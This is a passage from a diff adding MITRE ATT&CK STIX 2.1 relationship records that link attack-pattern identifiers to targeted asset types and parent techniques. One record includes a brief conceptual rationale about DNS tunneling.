"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--02f547fd-2565-4130-a4be-c4ba7b5aeb0c", + "created": "2023-09-29T17:59:31.091Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:59:31.091Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--02fee6ab-f7a1-4168-919f-63c4f0b3349c", + "created": "2020-01-30T17:48:49.751Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", + "target_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--031e4f8a-988b-4bf2-8d65-5312722c7ee9", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--033b4401-261f-498b-89f3-2bad9ff5907a", + "created": "2023-09-29T17:58:15.338Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:58:15.338Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--035bf863-153f-466b-a5f8-cbbf24410b36", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03659d44-7c3b-428d-828c-674d6ba235a9", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0370ae8d-059f-4730-9e68-116c4614622f", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--037cf1a5-1528-4c52-a57d-a695e8d3f40b", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0384ef48-ede0-4200-be47-413622f4c690", + "created": "2020-01-29T18:12:33.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", + "target_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0385300f-a9b0-4743-b0eb-24f3d6e59f68", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0388dfd2-1d6f-41a1-a372-bed20d1bd889", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03a3226b-0b28-49a9-860f-a8c13ffbe00d", + "created": "2020-03-13T21:03:18.884Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf", + "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03aab956-54f3-4e4b-93a7-6d1898d91b57", + "created": "2023-09-29T16:29:03.438Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:29:03.438Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03af4f7d-7d69-4460-9f15-e982289e2d3c", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03b75755-69a5-40a2-a0d1-c5c5d77b5440", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03d6c21d-085c-4f37-9272-6c9fdcd14ad3", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03e265db-06d8-4378-a3f0-ee75724ebc2a", + "created": "2024-06-27T08:51:33.010Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:51:33.010Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03e94c12-cd51-4f39-a33d-c66a31bbf361", + "created": "2023-09-29T17:40:34.866Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:40:34.866Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03f27ef7-f1b2-4d53-a0cb-542313752d28", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03f3901c-c47e-44e1-ad3c-a858639b455e", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--03fc2c6a-a498-4c69-909a-df1fef3dfe6d", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--040aa757-e0bd-4eaa-bafc-7e8052cbcfba", + "created": "2024-06-27T09:29:01.701Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:29:01.701Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--041f0292-46b1-4d34-9a5f-95ff7fb28ace", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--042f383d-ce12-4f7f-85ed-ad1410302a07", + "created": "2024-05-23T04:04:25.765Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-23T19:54:08.739Z", + "description": "Asset Mapping Rationale: Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", + "relationship_type": "targets", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--043ce252-be4f-4252-b7ee-3c0e999068e5", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0468ff9d-7ef2-46e2-9ce2-082a16e48795", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--046c0945-3675-42e6-87e8-244c9a78a5f8", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--04799a29-6578-4f5f-9ea0-4e7ae702eef1", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--049ce77e-19b0-4641-8e49-8504ab47921e", + "created": "2020-01-24T19:00:33.125Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--04aad4a8-8b8c-45d9-bb34-508fe4792863", + "created": "2023-09-28T20:29:11.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:29:11.776Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--04e63623-4bca-41b8-b04a-349f1421dd5c", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--04e78617-89cf-4b21-9bb9-1dfdb57e15d2", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--04effe77-e813-4784-96c5-8e487f6725e0", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--04f096c3-3cae-4918-b458-5e5352e00d50", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--04f3247e-a606-4e0a-bbdf-a293e2168aeb", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--04f3ef6d-cb3b-49f9-abe1-1eb4864ccd18", + "created": "2024-06-24T19:03:25.154Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-24T19:03:25.154Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--050375ee-886b-4e4a-b323-c0919a75a614", + "created": "2024-06-25T13:21:56.158Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:21:56.158Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--050b13e6-22e2-450c-a075-44a79fb79dc9", + "created": "2020-02-11T18:42:07.392Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "x_mitre_modified_by_ref": 